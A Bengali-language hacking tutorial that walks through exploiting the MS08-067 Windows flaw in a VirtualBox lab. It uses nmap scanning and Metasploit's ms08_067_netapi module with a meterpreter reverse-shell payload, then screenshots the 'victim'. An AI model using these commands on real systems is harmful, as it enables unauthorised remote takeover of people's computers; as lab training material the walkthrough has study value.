এটা একটু Advance Level এর হ্যাকিং। অনেকেরই হয়ত বুঝতে অসুবিধা হতে পারে। সেক্ষত্রে কমেন্টস করুন
শুধু কি IP সিস্টম হ্যাক করা সম্ভব, হ্যা। কারন NetAPI32.dll(CVE-2008-4250)দুর্বলতা।.[netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network]
(Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
আপনার টার্গেট সিস্টেম যদি Vulnerable OS ব্যবহার করে তাহলে আপনি তাকে খুব সহজেই হ্যাক করতে পারবেন।
এই প্রক্রিয়া সম্পন্ন করতে যেগুলো প্রয়োজনঃ
Virtual Box
Backtrack 5
Target OS
Step One: Create Virtual Machine
দুইটি Virtual Machine তৈরি করুন, একটার নাম দিন Target OS এবং অন্যটার নাম দিন BT5।
Target OS এ
The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.
A malicious request to vulnerable system results in complete compromise of vulnerable computers.
Exploiting the MS08-067 using Metasploit)
Windows XP Install করুন, এবং BT5 এ Backtreack 5 Install করুন।
আপনার যদি Virtual Machine সম্পর্কে ধারনা না থাকে তাহলে VM Manual পড়ুন।
Step Two: Find the IP address of Target
Target এর IP বের করার জন্য VM(XP)তে cmd prompt ওপেন করুন(W+R+cmd and hit enter)
এবং টাইপ করুন ipconfig এবং Enter প্রেস করুন।
(সাধারনত Advance হ্যাকাররা IP জানতে অন্য ধরনের পদ্ধতি অনুসরন করে, যেমনঃ
Angry IP Scanner বা লিঙ্ক পাঠিয়ে ও অনেকেই IP বের করেন।
Step three:
এবার আমরা namp tool ব্যবহার করব।BT5(Backtrack 5) Start করুন এবং Terminal Open করুন Type করুনঃ
nmap -O 192.168.56.12
এখানে 192.168.56.12 হল Target machine এর IP ।ফলাফল দেখুন, আপনি টার্গেট এর open port এবং OS দেখতে পাবেন।
Step four: Metasploit
এবার BT5 এর Terminal ওপেন করুন, (Ctrl+Alt+T)এবং টাইপ করুন msfconsole। Msfconsole, Metasploit Framework এর সবচেয়ে জনপ্রিয় একটা বৈশিষ্ট্য। এবার আমরা সার্চ কমান্ড ব্যবহার করব।, এজন্য
“search netapi” টাইপ করুন। এবার আপনি অবশ্যই netapi এর সাথে Module Match লিস্ট দেখতে পাবেন।
এবার আমরা MS08-067, exploit করব।সুতরাং টাইপ করুনঃ
“use exploit/windows/smb/ms08_067_netapi“
Step 5: Set Payload
Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.
Step 6: Options
Type “set LHOST 192.168.56.10“. এখানে 192.168.56.10 হল Backtrack এর IP। আপনি টার্মিনালে ‘ifconfig’ লিখেও এটা পেতে পারেন।
এবার Type “set RHOST 192.168.56.12“ এখানে 192.168.56.12 হল টার্গেট মেশিন এর IP।
Step 7: Exploiting
এবার এটা দুর্বলতার সুযোগ নেয়ার সময় সুতরাং type “exploit” in the console, যদি এক্সপ্লয়েট সাক্সেস হয় টাহলে আপনিও নিচের মত ফলাফল দেখতে পাবেন।
এখন আপনি Remote Computer কে নিজের মত Control করতে পারবেন।যেমন Screen Shot নেয়ার জন্য টাইপ করুন,
“screenshot”
এবং দেখুন আপনার ভিক্টিমের Screen Shot
